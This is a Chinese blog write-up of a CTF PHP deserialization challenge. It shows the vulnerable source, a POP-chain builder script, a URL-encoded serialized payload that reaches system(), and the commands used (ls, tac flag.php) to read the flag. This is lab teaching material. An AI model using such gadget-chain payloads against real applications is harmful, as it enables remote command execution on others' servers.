cs反序列化4

最新推荐文章于 2022-09-22 17:05:51 发布
最新推荐文章于 2022-09-22 17:05:51 发布
阅读量335 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113369615
版权

cs反序列化4

<?php
highlight_file(__FILE__);
error_reporting(0);
class test{
    public $peguin;
    public $source;
    public function __construct($file){
        $this->source = $file;
        echo 'welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->peguin->close();
    }
    public function __wakeup(){
        if(preg_match('/http|file|data|dict|\.\./i',$this->source)){
            echo "hacker!";
            $this->source = "index.php";
        }
    }
}
class good{
    public $joker;
    public function __call($name,$param){
        system($this->joker);
    }
}
$a = $_GET['cmd'];
unserialize($a);
?>

__call():当调用类中不存在的方法时,就会调用__call();
__wakeup():unserialize时会调用
__toString():当把一个类当作字符串处理时调用
__construct()new一个类时调用

流程

  1. 反序列化$a,调用__wakeup()
  2. source=new test类,调用__toString()
  3. __toString()会使用也给不存在的方法,于是调用__call()
  4. $joker为我们要执行的命令
<?php
highlight_file(__FILE__);
error_reporting(0);
class test{
    public $peguin;
    public $source;
   
}
class good{
    public $joker="ls ../../../../..";
   
}


$a=new test();
$a->source=new test();
$a->source->peguin=new good();

echo urlencode(serialize($a));

run:O%3A4%3A%22test%22%3A2%3A%7Bs%3A6%3A%22peguin%22%3BN%3Bs%3A6%3A%22source%22%3BO%3A4%3A%22test%22%3A2%3A%7Bs%3A6%3A%22peguin%22%3BO%3A4%3A%22good%22%3A1%3A%7Bs%3A5%3A%22joker%22%3Bs%3A17%3A%22ls+..%2F..%2F..%2F..%2F..%22%3B%7Ds%3A6%3A%22source%22%3BN%3B%7D%7D

在这里插入图片描述
怎么没有flag

$joker="ls"

在这里插入图片描述

$joker="cat flag.php"

出了个寂寞,为什么
原来在源代码里面
在这里插入图片描述

Linux读取文件的一些命令
cat  从第一行开始,显示文件的所有内容
tac  从第最后一行开始,显示文件的所有内容(正好与cat相反)
more 根据窗口大小,一页一页的实现文件内容
less 和more类似,但是优点是是可以往前翻页和搜索字符
head  只显示前几行
tail  只显示后几行
nl     类似于cat -n,显示时输出行号

这道题如果用cat就不能在页面上显示,用tac的话就可以在这里插入图片描述

切谁怕谁
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cs序列2
missht0的博客
01-28 130
cs序列2 http://111.229.84.70:9998/ <?php highlight_file(__FILE__); class HZNU{ private $username; private $password; public function __construct($user,$pass){ $this->username=$user; $this->password=$pass; }
php序列pop链
yourdawntown的博客
09-04 575
成都理工平台的一道序列 源码如下 <?php highlight_file(__FILE__); class A { public $a; private $b; protected $c; public function __construct($a, $b, $c) { $this->a = $a; $this->b = $b; $this->c = $c; } protected function flag()
php序列之字符逃逸
qq_53856457的博客
05-14 1612
php序列之字符逃逸法 1.按我的理解,序列的过程就是碰到;}与最前面的{配对后,便停止序列。如下序列: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
PHP序列漏洞总结
u013797594的博客
06-11 2467
PHP序列漏洞总结
1.29刷题记录
conelly的博客
01-29 813
[MRCTF2020]Ezpop Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected
C# xml序列序列
最新发布
01-05
在C#编程中,XML序列序列是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
XML序列序列 实战
08-16
4. 数据持久:对象状态可以被序列到磁盘,当需要时再序列恢复。 总的来说,这个实战项目提供了XML序列序列的实用工具,帮助开发者更高效地处理XML数据和C#对象之间的转换。通过理解和使用提供的...
C# 序列-序列.cs
09-06
C# 序列-序列.cs
C# 序列序列
04-15
在C#编程中,序列序列是两个关键的概念,它们主要用于数据持久、网络传输或跨进程通信。序列是将对象的状态转换为可存储或可传输的形式,而序列则是将这种形式的数据恢复为原来的对象。本主题主要...
c# CS登录实现(序列序列)LoginProcessVersion1.0
05-09
综上所述,"c# CS登录实现(序列序列)LoginProcessVersion1.0"项目涉及了客户端与服务器间的通信,其中序列序列是数据交换的核心技术。理解并掌握这些概念对于开发任何需要网络交互的应用都是至关...
ctfshow—PHP特性
cosmoslin的博客
09-14 2221
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
[SCUCTF2022]校赛Web出题笔记
cosmoslin的博客
05-27 1967
前言 本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。 checkin <?php error_reporting(0); $action = $_GET['a']?$_GET['a']:highlight_file(__FILE__); if($action==='inject'){ die('Permission denied'); } $lock = call_user_func(($_GET['Y'])); if (
CTFshow刷题日记-WEB-PHP特性(下篇123-150)
Love&Share
09-05 3317
web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`
ctf刷题小结
quan9i的博客
05-15 6242
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
ctfshow_序列
qq_45951598的博客
01-27 1546
文章目录WEB254web255 WEB254 源码: error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-
ctfshow web入门 序列
Lumos427的博客
02-25 1377
序列序列 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
PHP 原生类学习与利用
snowlyzz的博客
09-22 1374
php 原生类利用与学习。
ctfshow php特性系列
xiaolong22333的博客
04-18 4192
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
php特性<2>--ctfshow
unexpectedthing的博客
11-01 2043
文章目录1.sha1的绕过web104,1062.php变量覆盖web1053.parse_str的绕过web1074.ereg %00正则截断web1085.php异常类web1096.FilesystemIterator类的使用web1107.GLOBALS超全局变量web1118.php伪协议WEB1129./proc/self/root绕过web11310. php伪协议--filterweb11411.trim函数的绕过+is_numeric的绕过web11512.gettext拓展的使用web1
c# protobuf序列
09-07
6. 如果要将字节数组序列回消息对象,可以使用解析器类: ```csharp Person deserializedPerson = Person.Parser.ParseFrom(data); ``` 现在,您可以使用deserializedPerson对象访问序列后的数据。 这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值